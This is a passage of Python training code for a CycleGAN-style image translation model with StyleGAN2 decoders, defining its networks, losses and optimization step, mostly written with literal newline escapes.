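                               lambda_A=10.0, lambda_B=10.0, lambda_idt=0.5):
    import torch
    l1 = torch.nn.L1Loss()
    loss_cycle_A = l1(G_B(G_A(real_A)), real_A) * lambda_A  # forward cycle A -> B -> A
    loss_cycle_B = l1(G_A(G_B(real_B)), real_B) * lambda_B  # backward cycle B -> A -> B
    loss_idt = (l1(G_A(real_B), real_B) * lambda_B +
                l1(G_B(real_A), real_A) * lambda_A) * lambda_idt  # identity terms
    return loss_cycle_A + loss_cycle_B + loss_idt
# --- end aside ---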
parser.add_argument('--randomize_noise', action='store_true', help='whether to use random noise in sty2 decoder')\n parser.add_argument('--D_lightness', type=int, default=1, help='sty2 discriminator lightness, 1: normal, then 2, 4, 8 for less parameters')\n\n parser.add_argument('--w_loss', action='store_true')\n parser.add_argument('--lambda_w_loss', type=float, default=10.0)\n\n parser.add_argument('--n_loss', action='store_true')\n parser.add_argument('--lambda_n_loss', type=float, default=10.0)\n\n parser.add_argument('--cam_loss', action='store_true')\n parser.add_argument('--lambda_cam', type=float, default=10.0)\n parser.add_argument('--sty2_clamp', action='store_true')\n \n return parser\n \n def __init__(self, opt):\n BaseModel.__init__(self, opt)\n \n # specify the training losses you want to print out. The program will call base_model.get_current_losses\n losses = ['G_A','G_B']\n losses += ['D_A', 'D_B']\n losses=[]\n if opt.out_mask:\n losses += ['out_mask_AB','out_mask_BA']\n\n losses += ['cycle_A', 'idt_A', \n 'cycle_B', 'idt_B', \n 'sem_AB', 'sem_BA', 'f_s']\n\n losses += ['g_nonsaturating_A','g_nonsaturating_B']\n\n if self.opt.g_reg_every != 0:\n losses +=['weighted_path_A','weighted_path_B']\n\n losses+= ['d_dec_A','d_dec_B']\n\n if self.opt.d_reg_every != 0:\n losses += ['grad_pen_A','grad_pen_B']#,'d_dec_reg_A', 'd_dec_reg_B']\n\n if opt.w_loss:\n losses += ['w_A','w_B']\n\n if opt.n_loss:\n losses += ['n_A','n_B']\n\n if opt.cam_loss:\n losses += ['cam']\n\n self.loss_names = losses\n self.truncation = opt.truncation\n self.randomize_noise = opt.randomize_noise\n self.r1 = opt.r1\n self.percept_loss = opt.percept_loss\n \n # specify the images you want to save/display. The program will call base_model.get_current_visuals\n visual_names_A = ['real_A', 'fake_B', 'rec_A']\n\n visual_names_B = ['real_B', 'fake_A', 'rec_B']\n\n if self.isTrain and self.opt.lambda_identity > 0.0:\n visual_names_A.append('idt_B')\n visual_names_B.append('idt_A') # beniz: inverted for original\n\n visual_names_seg_A = ['input_A_label','gt_pred_A','pfB_max']\n\n \n visual_names_seg_B = ['input_B_label','gt_pred_B','pfA_max']\n \n visual_names_out_mask = ['real_A_out_mask','fake_B_out_mask','real_B_out_mask','fake_A_out_mask']\n\n visual_names_mask = ['fake_B_mask','fake_A_mask']\n\n visual_names_mask_in = ['real_B_mask','fake_B_mask','real_A_mask','fake_A_mask',\n 'real_B_mask_in','fake_B_mask_in','real_A_mask_in','fake_A_mask_in']\n \n self.visual_names = visual_names_A + visual_names_B + visual_names_seg_A + visual_names_seg_B \n\n if opt.out_mask :\n self.visual_names += visual_names_out_mask\n\n # specify the models you want to save to the disk. 
The program will call base_model.save_networks and base_model.load_networks\n if self.isTrain:\n self.model_names = ['G_A', 'G_B', 'f_s']\n else: # during test time, only load Gs\n self.model_names = ['G_A', 'f_s']\n\n # load/define networks\n # The naming conversion is different from those used in the paper\n # Code (paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)\n print('define gen')\n self.netG_A = networks.define_G(opt.input_nc, opt.output_nc,\n opt.ngf, opt.netG, opt.norm, \n not opt.no_dropout, opt.G_spectral, opt.init_type, opt.init_gain, self.gpu_ids, decoder=False, wplus=opt.wplus, wskip=opt.wskip,img_size=opt.crop_size,img_size_dec=opt.decoder_size)\n self.netG_B = networks.define_G(opt.output_nc, opt.input_nc,\n opt.ngf, opt.netG, opt.norm, \n not opt.no_dropout, opt.G_spectral, opt.init_type, opt.init_gain, self.gpu_ids, decoder=False, wplus=opt.wplus, wskip=opt.wskip,img_size=opt.crop_size,img_size_dec=opt.decoder_size)\n\n # Define stylegan2 decoder\n print('define decoder')\n self.netDecoderG_A = networks.define_decoder(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,size=self.opt.decoder_size,init_weight=not self.opt.no_init_weight_dec_sty2,clamp=self.opt.sty2_clamp)\n self.netDecoderG_B = networks.define_decoder(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,size=self.opt.decoder_size,init_weight=not self.opt.no_init_weight_dec_sty2,clamp=self.opt.sty2_clamp)\n \n # Load pretrained weights stylegan2 decoder\n \n nameDGA = 'DecoderG_A'\n nameDGB = 'DecoderG_B'\n if self.opt.load_weight_decoder:\n load_filename = 'network_A.pt'\n load_path = os.path.join(self.save_dir, load_filename)\n \n net = getattr(self, 'net' + nameDGA)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n \n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n net.load_state_dict(state_dict['g_ema'])\n self.set_requires_grad(net, True)\n \n load_filename = 'network_B.pt'\n load_path = os.path.join(self.save_dir, load_filename)\n \n net = getattr(self, 'net' + nameDGB)\n \n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n \n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n net.load_state_dict(state_dict['g_ema'])\n self.set_requires_grad(net, True)\n\n if self.opt.truncation < 1:\n self.mean_latent_A = self.netDecoderG_A.module.mean_latent(4096)\n self.mean_latent_B = self.netDecoderG_B.module.mean_latent(4096)\n else:\n self.mean_latent_A = None\n self.mean_latent_B = None\n \n \n \n self.model_names += [nameDGA,nameDGB]\n \n print('define dis dec')\n self.netDiscriminatorDecoderG_A = networks.define_discriminatorstylegan2(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,init_weight=not self.opt.no_init_weight_D_sty2,img_size=self.opt.crop_size,lightness=opt.D_lightness)\n self.model_names += ['DiscriminatorDecoderG_A']\n\n self.netDiscriminatorDecoderG_B = networks.define_discriminatorstylegan2(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,init_weight=not self.opt.no_init_weight_D_sty2,img_size=self.opt.crop_size,lightness=opt.D_lightness)\n self.model_names += ['DiscriminatorDecoderG_B']\n \n self.netf_s = networks.define_f(opt.input_nc, nclasses=opt.semantic_nclasses, \n init_type=opt.init_type, init_gain=opt.init_gain,\n 
gpu_ids=self.gpu_ids, fs_light=opt.fs_light)\n\n if self.opt.cam_loss:\n self.netCamClassifier_w_B = networks.define_classifier_w(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,init_weight=not self.opt.no_init_weight_D_sty2,img_size_dec=self.opt.decoder_size)\n self.model_names += ['CamClassifier_w_B']\n self.netCamClassifier_w_A = networks.define_classifier_w(init_type=opt.init_type, init_gain=opt.init_gain,gpu_ids=self.gpu_ids,init_weight=not self.opt.no_init_weight_D_sty2,img_size_dec=self.opt.decoder_size)\n self.model_names += ['CamClassifier_w_A']\n \n if self.isTrain:\n if opt.lambda_identity > 0.0: # only works when input and output images have the same number of channels\n assert(opt.input_nc == opt.output_nc)\n self.fake_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images\n self.fake_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images\n self.real_A_pool = ImagePool(opt.pool_size)\n self.real_B_pool = ImagePool(opt.pool_size)\n \n # define loss functions\n if opt.D_label_smooth:\n target_real_label = 0.9\n else:\n target_real_label = 1.0\n self.criterionGAN = loss.GANLoss(opt.gan_mode,target_real_label=target_real_label).to(self.device)\n if opt.percept_loss:\n self.criterionCycle = VGGPerceptualLoss().cuda()\n self.criterionCycle2 = torch.nn.MSELoss()\n self.criterionIdt = VGGPerceptualLoss().cuda()\n self.criterionIdt2 = torch.nn.MSELoss()\n else:\n self.criterionCycle = torch.nn.L1Loss()\n self.criterionIdt = torch.nn.L1Loss()\n \n self.criterionf_s = torch.nn.modules.CrossEntropyLoss()\n if opt.out_mask:\n if opt.loss_out_mask == 'L1':\n self.criterionMask = torch.nn.L1Loss()\n elif opt.loss_out_mask == 'MSE':\n self.criterionMask = torch.nn.MSELoss()\n elif opt.loss_out_mask == 'Charbonnier':\n self.criterionMask = L1_Charbonnier_loss(opt.charbonnier_eps)\n\n if opt.w_loss:\n self.criterion_w = torch.nn.MSELoss()\n\n if opt.n_loss:\n self.criterion_n = torch.nn.MSELoss()\n\n if opt.cam_loss:\n self.criterion_cam_w = torch.nn.BCEWithLogitsLoss()\n \n # initialize optimizers\n if opt.cam_loss:\n self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters(),self.netDecoderG_A.parameters(), self.netDecoderG_B.parameters(),self.netCamClassifier_w_A.parameters(),self.netCamClassifier_w_B.parameters()),\n lr=opt.lr, betas=(opt.beta1, 0.999))\n else:\n self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters(),self.netDecoderG_A.parameters(), self.netDecoderG_B.parameters()),\n lr=opt.lr, betas=(opt.beta1, 0.999))\n\n self.optimizer_f_s = torch.optim.Adam(self.netf_s.parameters(), lr=opt.lr_f_s, betas=(opt.beta1, 0.999))\n\n self.optimizer_D_Decoder = torch.optim.Adam(itertools.chain(self.netDiscriminatorDecoderG_A.parameters(),self.netDiscriminatorDecoderG_B.parameters()),\n lr=opt.D_lr, betas=(opt.beta1, 0.999))\n self.optimizers = []\n self.optimizers.append(self.optimizer_G)\n #self.optimizers.append(self.optimizer_D)\n #beniz: not adding optimizers f_s (?)\n\n self.rec_noise = opt.rec_noise\n self.stddev = 0.1\n self.D_noise = opt.D_noise\n\n self.niter=0\n self.mean_path_length_A = 0\n self.mean_path_length_B = 0\n \n \n def set_input(self, input):\n AtoB = self.opt.direction == 'AtoB'\n self.real_A = input['A' if AtoB else 'B'].to(self.device)\n self.real_B = input['B' if AtoB else 'A'].to(self.device)\n self.image_paths = input['A_paths' if AtoB else 'B_paths']\n\n if 'A_label' in input 
:\n #self.input_A_label = input['A_label' if AtoB else 'B_label'].to(self.device)\n self.input_A_label = input['A_label'].to(self.device).squeeze(1)\n #self.input_A_label_dis = display_mask(self.input_A_label) \n if 'B_label' in input:\n self.input_B_label = input['B_label'].to(self.device).squeeze(1) # beniz: unused\n #self.image_paths = input['B_paths'] # Hack!! forcing the labels to corresopnd to B domain\n\n\n def forward(self):\n self.z_fake_B, self.n_fake_B = self.netG_A(self.real_A)\n\n d = 1\n \n #self.netDecoderG_A.eval()\n self.fake_B,self.latent_fake_B = self.netDecoderG_A(self.z_fake_B,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_A,randomize_noise=self.randomize_noise,return_latents=True, noise=self.n_fake_B)\n if self.opt.decoder_size > self.opt.crop_size:\n self.fake_B = F.interpolate(self.fake_B,self.opt.crop_size)\n \n if self.isTrain:\n #self.netDecoderG_B.eval()\n if self.rec_noise > 0.0:\n self.fake_B_noisy1 = gaussian(self.fake_B, self.rec_noise)\n self.z_rec_A, self.n_rec_A = self.netG_B(self.fake_B_noisy1)\n else:\n self.z_rec_A, self.n_rec_A = self.netG_B(self.fake_B)\n self.rec_A = self.netDecoderG_B(self.z_rec_A,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_B, randomize_noise=self.randomize_noise, noise=self.n_rec_A)[0]\n if self.opt.decoder_size > self.opt.crop_size:\n self.rec_A = F.interpolate(self.rec_A,self.opt.crop_size)\n \n self.z_fake_A, self.n_fake_A = self.netG_B(self.real_B)\n self.fake_A,self.latent_fake_A = self.netDecoderG_B(self.z_fake_A,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_B,randomize_noise=self.randomize_noise,return_latents=True, noise=self.n_fake_A)\n if self.opt.decoder_size > self.opt.crop_size:\n self.fake_A = F.interpolate(self.fake_A,self.opt.crop_size)\n \n if self.rec_noise > 0.0:\n self.fake_A_noisy1 = gaussian(self.fake_A, self.rec_noise)\n self.z_rec_B, self.n_rec_B = self.netG_A(self.fake_A_noisy1)\n else:\n self.z_rec_B, self.n_rec_B = self.netG_A(self.fake_A)\n self.rec_B = self.netDecoderG_A(self.z_rec_B,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_A, randomize_noise=self.randomize_noise, noise=self.n_rec_B)[0]\n if self.opt.decoder_size > self.opt.crop_size:\n self.rec_B = F.interpolate(self.rec_B,self.opt.crop_size)\n \n self.pred_real_A = self.netf_s(self.real_A)\n \n \n self.gt_pred_A = F.log_softmax(self.pred_real_A,dim= d).argmax(dim=d)\n \n self.pred_real_B = self.netf_s(self.real_B)\n self.gt_pred_B = F.log_softmax(self.pred_real_B,dim=d).argmax(dim=d)\n \n self.pred_fake_A = self.netf_s(self.fake_A)\n \n self.pfA = F.log_softmax(self.pred_fake_A,dim=d)#.argmax(dim=d)\n self.pfA_max = self.pfA.argmax(dim=d)\n\n if hasattr(self,'criterionMask'):\n label_A = self.input_A_label\n label_A_in = label_A.unsqueeze(1)\n label_A_inv = torch.tensor(np.ones(label_A.size())).to(self.device) - label_A\n label_A_inv = label_A_inv.unsqueeze(1)\n #label_A_inv = torch.cat ([label_A_inv,label_A_inv,label_A_inv],1)\n \n self.real_A_out_mask = self.real_A *label_A_inv\n self.fake_B_out_mask = self.fake_B *label_A_inv\n \n if self.D_noise:\n self.fake_B_noisy = gaussian(self.fake_B)\n self.real_A_noisy = gaussian(self.real_A)\n #self.real_A_mask_in = self.aug_seq(self.real_A_mask_in)\n #self.fake_B_mask_in = self.aug_seq(self.fake_B_mask_in)\n #self.real_A_mask = self.aug_seq(self.real_A_mask)\n #self.fake_B_mask = self.aug_seq(self.fake_B_mask)\n \n if hasattr(self, 'input_B_label'):\n 
\n label_B = self.input_B_label\n label_B_in = label_B.unsqueeze(1)\n label_B_inv = torch.tensor(np.ones(label_B.size())).to(self.device) - label_B\n label_B_inv = label_B_inv.unsqueeze(1)\n #label_B_inv = torch.cat ([label_B_inv,label_B_inv,label_B_inv],1)\n \n self.real_B_out_mask = self.real_B *label_B_inv\n self.fake_A_out_mask = self.fake_A *label_B_inv\n\n if self.D_noise:\n self.fake_A_noisy = gaussian(self.fake_A)\n self.real_B_noisy = gaussian(self.real_B)\n #self.real_B_mask_in = self.aug_seq(self.real_B_mask_in)\n #self.fake_A_mask_in = self.aug_seq(self.fake_A_mask_in)\n #self.real_B_mask = self.aug_seq(self.real_B_mask)\n #self.fake_A_mask = self.aug_seq(self.fake_A_mask)\n \n self.pred_fake_B = self.netf_s(self.fake_B)\n self.pfB = F.log_softmax(self.pred_fake_B,dim=d)#.argmax(dim=d)\n self.pfB_max = self.pfB.argmax(dim=d)\n\n\n \n def backward_D_basic(self, netD, real, fake):\n # Real\n pred_real = netD(real)\n loss_D_real = self.criterionGAN(pred_real, True)\n # Fake\n pred_fake = netD(fake.detach())\n loss_D_fake = self.criterionGAN(pred_fake, False)\n # Combined loss\n loss_D = (loss_D_real + loss_D_fake) * 0.5\n # backward\n loss_D.backward()\n return loss_D\n \n def backward_f_s(self):\n #print('backward fs')\n label_A = self.input_A_label\n # forward only real source image through semantic classifier\n pred_A = self.netf_s(self.real_A) \n self.loss_f_s = self.criterionf_s(pred_A, label_A)#.squeeze(1))\n if self.opt.train_f_s_B:\n label_B = self.input_B_label\n pred_B = self.netf_s(self.real_B) \n self.loss_f_s += self.criterionf_s(pred_B, label_B)#.squeeze(1))\n self.loss_f_s.backward()\n\n def backward_D_A(self):\n if self.D_noise:\n fake_B = self.fake_B_pool.query(self.fake_B_noisy)\n self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B_noisy, fake_B)\n else:\n fake_B = self.fake_B_pool.query(self.fake_B)\n self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B, fake_B)\n\n def backward_D_B(self):\n if self.D_noise:\n fake_A = self.fake_A_pool.query(self.fake_A_noisy)\n self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A_noisy, fake_A)\n else:\n fake_A = self.fake_A_pool.query(self.fake_A)\n self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A, fake_A)\n\n def backward_D_A_mask(self):\n fake_B_mask = self.fake_B_pool_mask.query(self.fake_B_mask)\n self.loss_D_A_mask = self.backward_D_basic(self.netD_A_mask, self.real_B_mask, fake_B_mask)\n\n def backward_D_B_mask(self):\n fake_A_mask = self.fake_A_pool_mask.query(self.fake_A_mask)\n self.loss_D_B_mask = self.backward_D_basic(self.netD_B_mask, self.real_A_mask, fake_A_mask)\n\n def backward_D_A_mask_in(self):\n fake_B_mask_in = self.fake_B_pool.query(self.fake_B_mask_in)\n self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B_mask_in, fake_B_mask_in)\n\n def backward_D_B_mask_in(self):\n fake_A_mask_in = self.fake_A_pool.query(self.fake_A_mask)\n self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A_mask_in, fake_A_mask_in)\n\n def backward_G(self):\n #print('BACKWARD G')\n lambda_idt = self.opt.lambda_identity\n lambda_A = self.opt.lambda_A\n lambda_B = self.opt.lambda_B\n lambda_G = self.opt.lambda_G\n # Identity loss\n if lambda_idt > 0:\n # G_A should be identity if real_B is fed.\n self.z_idt_A, self.n_idt_A = self.netG_A(self.real_B)\n self.idt_A = self.netDecoderG_A(self.z_idt_A,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_A,randomize_noise=self.randomize_noise, noise=self.n_idt_A)[0]\n if self.opt.decoder_size > 
self.opt.crop_size:\n self.idt_A = F.interpolate(self.idt_A,self.opt.crop_size)\n \n self.loss_idt_A = self.criterionIdt(self.idt_A, self.real_B) * lambda_B * lambda_idt\n if self.percept_loss:\n self.loss_idt_A += self.criterionIdt2(self.idt_A, self.real_B) * lambda_B * lambda_idt\n # G_B should be identity if real_A is fed.\n self.z_idt_B, self.n_idt_B = self.netG_B(self.real_A)\n self.idt_B = self.netDecoderG_B(self.z_idt_B,input_is_latent=True,truncation=self.truncation,truncation_latent=self.mean_latent_B,randomize_noise=self.randomize_noise, noise=self.n_idt_B)[0]\n if self.opt.decoder_size > self.opt.crop_size:\n self.idt_B = F.interpolate(self.idt_B,self.opt.crop_size)\n \n self.loss_idt_B = self.criterionIdt(self.idt_B, self.real_A) * lambda_A * lambda_idt\n if self.percept_loss:\n self.loss_idt_B += self.criterionIdt2(self.idt_B, self.real_A) * lambda_A * lambda_idt\n else:\n self.loss_idt_A = 0\n self.loss_idt_B = 0\n\n # Forward cycle loss\n self.loss_cycle_A = self.criterionCycle(self.rec_A, self.real_A) * lambda_A\n if self.percept_loss:\n self.loss_cycle_A += self.criterionCycle2(self.rec_A, self.real_A) * lambda_A\n # Backward cycle loss\n self.loss_cycle_B = self.criterionCycle(self.rec_B, self.real_B) * lambda_B\n if self.percept_loss:\n self.loss_cycle_B += self.criterionCycle2(self.rec_B, self.real_B) * lambda_B\n # combined loss standard cyclegan\n self.loss_G = self.loss_cycle_A + self.loss_cycle_B + self.loss_idt_A + self.loss_idt_B #self.loss_G_A + self.loss_G_B + \n\n # semantic loss AB\n self.loss_sem_AB = self.criterionf_s(self.pfB, self.input_A_label)\n \n # semantic loss BA\n if hasattr(self, 'input_B_label'):\n self.loss_sem_BA = self.criterionf_s(self.pfA, self.input_B_label)#.squeeze(1))\n else:\n self.loss_sem_BA = self.criterionf_s(self.pfA, self.gt_pred_B)#.squeeze(1))\n \n # only use semantic loss when classifier has reasonably low loss\n if not hasattr(self, 'loss_f_s') or self.loss_f_s.detach().item() > 1.0:\n self.loss_sem_AB = 0 * self.loss_sem_AB \n self.loss_sem_BA = 0 * self.loss_sem_BA \n self.loss_G += self.loss_sem_BA + self.loss_sem_AB\n\n lambda_out_mask = self.opt.lambda_out_mask\n\n if hasattr(self,'criterionMask'):\n self.loss_out_mask_AB = self.criterionMask( self.real_A_out_mask, self.fake_B_out_mask) * lambda_out_mask\n self.loss_out_mask_BA = self.criterionMask( self.real_B_out_mask, self.fake_A_out_mask) * lambda_out_mask\n self.loss_G += self.loss_out_mask_AB + self.loss_out_mask_BA\n\n\n compute_g_regularize = True\n if self.opt.path_regularize == 0.0 or self.opt.g_reg_every == 0 or not self.niter % self.opt.g_reg_every == 0 :\n #self.loss_weighted_path_A = 0* self.loss_weighted_path_A\n #self.loss_weighted_path_B = 0* self.loss_weighted_path_B\n compute_g_regularize = False\n \n #A\n self.fake_pred_g_loss_A = self.netDiscriminatorDecoderG_A(self.fake_A)\n self.loss_g_nonsaturating_A = self.g_nonsaturating_loss(self.fake_pred_g_loss_A)\n \n if compute_g_regularize:\n self.path_loss_A, self.mean_path_length_A, self.path_lengths_A = self.g_path_regularize(\n self.fake_A, self.latent_fake_A, self.mean_path_length_A\n )\n\n self.loss_weighted_path_A = self.opt.path_regularize * self.opt.g_reg_every * self.path_loss_A\n \n if self.opt.path_batch_shrink:\n self.loss_weighted_path_A += 0 * self.fake_A[0, 0, 0, 0]\n\n self.mean_path_length_avg_A = (\n self.reduce_sum(self.mean_path_length_A).item() / self.get_world_size()\n )\n else:\n self.loss_weighted_path_A = 0#*self.loss_weighted_path_A\n\n #B\n self.fake_pred_g_loss_B = 
self.netDiscriminatorDecoderG_B(self.fake_B)\n self.loss_g_nonsaturating_B = self.g_nonsaturating_loss(self.fake_pred_g_loss_B)\n \n if compute_g_regularize:\n self.path_loss_B, self.mean_path_length_B, self.path_lengths_B = self.g_path_regularize(\n self.fake_B, self.latent_fake_B, self.mean_path_length_B\n )\n\n self.loss_weighted_path_B = self.opt.path_regularize * self.opt.g_reg_every * self.path_loss_B\n \n if self.opt.path_batch_shrink:\n #self.loss_weighted_path_B += 0 * self.fake_img_path_loss_B[0, 0, 0, 0]\n self.loss_weighted_path_B += 0 * self.fake_B[0, 0, 0, 0]\n\n self.mean_path_length_avg_B = (\n self.reduce_sum(self.mean_path_length_B).item() / self.get_world_size()\n )\n else:\n self.loss_weighted_path_B = 0#*self.loss_weighted_path_B\n\n self.loss_G += self.opt.lambda_G*(self.loss_g_nonsaturating_A + self.loss_g_nonsaturating_B)\n\n if not self.opt.path_regularize == 0.0 and not self.opt.g_reg_every == 0 and self.niter % self.opt.g_reg_every == 0 :\n self.loss_G += self.loss_weighted_path_A + self.loss_weighted_path_B\n\n if self.opt.w_loss:\n p = random.uniform(0, 1)\n if p<0.5:#idt as reference\n self.loss_w_A = self.criterion_w(self.z_idt_B.clone().detach(),self.z_rec_A) * self.opt.lambda_w_loss\n self.loss_w_B = self.criterion_w(self.z_idt_A.clone().detach(),self.z_rec_B) * self.opt.lambda_w_loss\n else:#rec as reference\n self.loss_w_A = self.criterion_w(self.z_idt_B,self.z_rec_A.clone().detach()) * self.opt.lambda_w_loss\n self.loss_w_B = self.criterion_w(self.z_idt_A,self.z_rec_B.clone().detach()) * self.opt.lambda_w_loss\n\n self.loss_G += self.loss_w_A + self.loss_w_B\n\n if self.opt.n_loss:\n p = random.uniform(0, 1)\n temp_n_idt_B = [temp.flatten()for temp in self.n_idt_B]\n temp_n_idt_A = [temp.flatten()for temp in self.n_idt_A]\n temp_n_rec_B = [temp.flatten()for temp in self.n_rec_B]\n temp_n_rec_A = [temp.flatten()for temp in self.n_rec_A]\n if p<0.5:#idt as reference\n self.loss_n_A = self.criterion_n(torch.cat(temp_n_idt_B).clone().detach(),torch.cat(temp_n_rec_A)) * self.opt.lambda_n_loss\n self.loss_n_B = self.criterion_n(torch.cat(temp_n_idt_A).clone().detach(),torch.cat(temp_n_rec_B)) * self.opt.lambda_n_loss\n else:#rec as reference\n self.loss_n_A = self.criterion_n(torch.cat(temp_n_idt_B),torch.cat(temp_n_rec_A).clone().detach()) * self.opt.lambda_n_loss\n self.loss_n_B = self.criterion_n(torch.cat(temp_n_idt_A),torch.cat(temp_n_rec_B).clone().detach()) * self.opt.lambda_n_loss\n\n self.loss_G += self.loss_n_A + self.loss_n_B\n\n if self.opt.cam_loss:\n self.pred_w_fake_A = self.netCamClassifier_w_A(torch.stack(self.z_fake_A))\n self.pred_w_rec_A = self.netCamClassifier_w_A(torch.stack(self.z_rec_A))\n self.pred_w_idt_A = self.netCamClassifier_w_A(torch.stack(self.z_idt_A))\n \n self.pred_w_fake_B = self.netCamClassifier_w_B(torch.stack(self.z_fake_B))\n self.pred_w_rec_B = self.netCamClassifier_w_A(torch.stack(self.z_rec_B))\n self.pred_w_idt_B = self.netCamClassifier_w_B(torch.stack(self.z_idt_B))\n \n self.loss_cam = self.criterion_cam_w(self.pred_w_fake_A,torch.ones_like(self.pred_w_fake_A).to(self.device)) * self.opt.lambda_cam\n self.loss_cam += self.criterion_cam_w(self.pred_w_fake_B,torch.ones_like(self.pred_w_fake_B).to(self.device))* self.opt.lambda_cam\n self.loss_cam += self.criterion_cam_w(self.pred_w_rec_B,torch.ones_like(self.pred_w_rec_B).to(self.device))* self.opt.lambda_cam\n self.loss_cam += self.criterion_cam_w(self.pred_w_rec_A,torch.ones_like(self.pred_w_rec_A).to(self.device))* self.opt.lambda_cam\n\n self.loss_cam += 
self.criterion_cam_w(self.pred_w_idt_A,torch.zeros_like(self.pred_w_idt_A).to(self.device)) * self.opt.lambda_cam\n self.loss_cam += self.criterion_cam_w(self.pred_w_idt_B,torch.zeros_like(self.pred_w_idt_B).to(self.device)) * self.opt.lambda_cam\n\n self.loss_G += self.loss_cam\n \n self.loss_G.backward()\n\n def backward_discriminator_decoder(self):\n real_pred_A = self.netDiscriminatorDecoderG_A(self.real_A)\n fake_pred_A = self.netDiscriminatorDecoderG_A(self.fake_A_pool.query(self.fake_A))\n\n self.loss_d_dec_A = self.d_logistic_loss(real_pred_A,fake_pred_A).unsqueeze(0)\n\n #print(self.loss_d_dec_A)\n \n\n \n real_pred_B = self.netDiscriminatorDecoderG_B(self.real_B)\n fake_pred_B = self.netDiscriminatorDecoderG_B(self.fake_B_pool.query(self.fake_B))\n self.loss_d_dec_B = self.d_logistic_loss(real_pred_B,fake_pred_B).unsqueeze(0)\n\n self.loss_d_dec = self.loss_d_dec_A + self.loss_d_dec_B\n #print(self.d_loss)\n #print(self.d_loss.shape)\n \n if self.opt.d_reg_every != 0:\n if self.niter %self.opt.d_reg_every == 0:\n temp = real_pred_A/real_pred_A.detach()\n \n #self.real_A.requires_grad = True\n #real_pred_A_2 = self.netDiscriminatorDecoderG_A(self.real_A)\n cur_real_A = self.real_A_pool.query(self.real_A)\n cur_real_A.requires_grad = True\n real_pred_A_2 = self.netDiscriminatorDecoderG_A(cur_real_A)\n #r1_loss_A = self.d_r1_loss(real_pred_A_2, cur_real_A)\n\n self.loss_grad_pen_A = self.gradient_penalty(cur_real_A,real_pred_A_2,self.r1)\n \n #self.loss_d_dec_reg_A=self.opt.r1 / 2 * r1_loss_A * self.opt.d_reg_every * temp\n \n #self.real_B.requires_grad = True\n #real_pred_B_2 = self.netDiscriminatorDecoderG_B(self.real_B)\n cur_real_B = self.real_B_pool.query(self.real_B)\n cur_real_B.requires_grad = True\n real_pred_B_2 = self.netDiscriminatorDecoderG_B(cur_real_B)\n #r1_loss_B = self.d_r1_loss(real_pred_B_2, cur_real_B)\n \n self.loss_grad_pen_B = self.gradient_penalty(cur_real_B,real_pred_B_2,self.r1)\n \n #self.loss_d_dec_reg_B=self.opt.r1 / 2 * r1_loss_B * self.opt.d_reg_every * temp\n \n #self.loss_d_dec_reg_A = 0 * self.loss_d_dec_reg_A\n #self.loss_d_dec_reg_B = 0 * self.loss_d_dec_reg_B\n else:\n self.loss_grad_pen_A = 0# * self.loss_grad_pen_A\n self.loss_grad_pen_B = 0# * self.loss_grad_pen_B\n\n #self.loss_d_dec += self.loss_d_dec_reg_A + self.loss_d_dec_reg_B\n self.loss_d_dec += self.loss_grad_pen_A + self.loss_grad_pen_B\n\n self.loss_d_dec.backward()\n\n def optimize_parameters(self):\n \"\"\"Calculate losses, gradients, and update network weights; called in every training iteration\"\"\"\n # forward\n self.forward() # compute fake images and reconstruction images.\n # G_A and G_B\n\n self.set_requires_grad([self.netDiscriminatorDecoderG_A,self.netDiscriminatorDecoderG_B], False)\n self.set_requires_grad([self.netG_A, self.netG_B], True)\n self.set_requires_grad([self.netDecoderG_A, self.netDecoderG_B], True)\n self.netDecoderG_A.zero_grad()\n self.netDecoderG_B.zero_grad()\n self.optimizer_G.zero_grad() # set G_A and G_B's gradients to zero\n self.backward_G() # calculate gradients for G_A and G_B\n self.optimizer_G.step() # update G_A and G_B's weights\n\n self.set_requires_grad([self.netf_s], True)\n # f_s\n self.optimizer_f_s.zero_grad()\n self.backward_f_s()\n self.optimizer_f_s.step()\n\n self.optimizer_D_Decoder.zero_grad()\n self.niter = self.niter +1\n self.set_requires_grad([self.netDiscriminatorDecoderG_A,self.netDiscriminatorDecoderG_B], True)\n self.backward_discriminator_decoder()\n self.optimizer_D_Decoder.step()\n 
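# --- Editor's aside (hedged illustration; not part of the original record) ---
# This training step alternates three updates: the generators (with both
# stylegan2 discriminators frozen), the semantic classifier f_s, and finally
# the discriminators. The logistic losses defined just below
# (d_logistic_loss / g_nonsaturating_loss) reduce to softplus terms; a
# standalone restatement, assuming raw (pre-sigmoid) discriminator scores:
def _logistic_gan_losses_sketch(real_pred, fake_pred):
    import torch.nn.functional as F
    d_loss = F.softplus(-real_pred).mean() + F.softplus(fake_pred).mean()
    g_loss = F.softplus(-fake_pred).mean()  # non-saturating generator loss
    return d_loss, g_loss
# --- end aside ---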
